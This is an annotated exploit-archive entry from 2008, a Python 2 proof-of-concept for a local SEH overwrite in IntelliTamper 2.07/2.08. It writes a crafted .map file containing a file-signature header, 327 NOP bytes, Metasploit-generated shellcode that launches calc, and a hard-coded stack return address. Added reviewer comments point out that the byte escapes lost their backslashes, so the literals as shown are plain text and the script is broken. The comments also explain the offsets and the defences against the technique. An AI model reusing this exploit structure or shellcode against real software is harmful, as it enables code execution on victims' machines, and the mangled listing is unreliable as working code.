
# Title : IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit
# Published : 2008-12-28
# Author : Cnaph


#!/usr/bin/python
# IntelliTamper 2.07/2.08  (MAP File) 0-day Local SEH Overwrite Exploit
# Bug discovered by cN4phux <cN4phux@gmail.com>
# Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Here's the debugger output at the crash: EIP is overwritten and the program attempts to read from address 41414141, so it crashes.
# EAX 0015B488 ECX 00123400 EDX 00123610
# EBX 00000000 ESP 00123604 EBP 00128B78
# ESI 00000000 EDI 00123A64 EIP 41414141
#Vive les Algeriens & greatz to friend's : me (XD) Heurs, Djug , Blub , His0k4 , Knuthy , Moorish , Ilyes ,
#Here's the the Poc :


import sys  # imported but never referenced below

# --- MAP file layout -------------------------------------------------------
# NOTE(review): the string literals in this listing appear to have lost
# their backslashes on extraction ("x23" where the original was the byte
# escape "\x23"; likewise "n" for "\n" in the strings further down).  As
# written, every literal is plain ASCII text rather than the raw bytes the
# comments describe, so the file this script produces is inert; the
# "160 byte" size remark on the payload only holds for the escaped form.
#
# Text header.  The hex pairs decode to "### SITEMAP1 INTELLITAMPER\r\n",
# presumably the file signature the application checks first -- verify
# against the MAP format.
map_theader = ((("x23x23x23x20x53x49x54x45x4D"
                 "x41x50x31x20x49x4Ex54x45x4C"
                 "x4Cx49x54x41x4Dx50x45x52x0Dx0A"))) # "### SITEMAP1 INTELLITAMPER\r\n"

# Record marker that precedes the oversized field; decodes to "FILE##".
map_iheader = "x46x49x4Cx45x23x23"

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Metasploit-generated payload string whose only action is to launch calc
# as a benign demonstration.  Per the escape note above, in this listing it
# is text, not executable bytes.
shellcode = ((("x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xc5"
               "x91xc1x60x83xebxfcxe2xf4x39x79x85x60xc5x91x4ax25"
               "xf9x1axbdx65xbdx90x2exebx8ax89x4ax3fxe5x90x2ax29"
               "x4exa5x4ax61x2bxa0x01xf9x69x15x01x14xc2x50x0bx6d"
               "xc4x53x2ax94xfexc5xe5x64xb0x74x4ax3fxe1x90x2ax06"
               "x4ex9dx8axebx9ax8dxc0x8bx4ex8dx4ax61x2ex18x9dx44"
               "xc1x52xf0xa0xa1x1ax81x50x40x51xb9x6cx4exd1xcdxeb"
               "xb5x8dx6cxebxadx99x2ax69x4ex11x71x60xc5x91x4ax08"
               "xf9xcexf0x96xa5xc7x48x98x46x51xbax30xadx61x4bx64"
               "x9axf9x59x9ex4fx9fx96x9fx22xf2xa0x0cxa6x91xc1x60"))); # 160 bytes in the escaped form

# Padding: 327 repetitions of "x90" (the NOP opcode 0x90 once escaped).  The
# count fixes where `retn` lands relative to the header and is specific to
# the tested 2.07/2.08 builds.
header_nop = "x90"*327

# Overwrite value: four bytes (little-endian 0x0012347b, an address in the
# same stack region as ESP 00123604 in the header comment) plus ".htmln"
# (".html\n" before the escapes were lost).  A hard-coded stack address like
# this only holds on a layout without ASLR, and the SEH-overwrite technique
# named in the title is exactly what SafeSEH/SEHOP and DEP were introduced
# to defeat -- the bug is real, but the crash is the reliable part.
retn = "x7bx34x12x00"+".htmln" # EIP value with 4 byte fix

# Assemble the record and write it to 0x.map in the current directory.
# Python 2 style: bare open/close instead of a `with` block, and the print
# statements below will not parse under Python 3.
exploit = map_theader + map_iheader + header_nop + shellcode + retn
headers = open("0x.map", "w")
headers.write(exploit)
headers.close()

print "nFile created successfully !";
print "ncN4phux.";
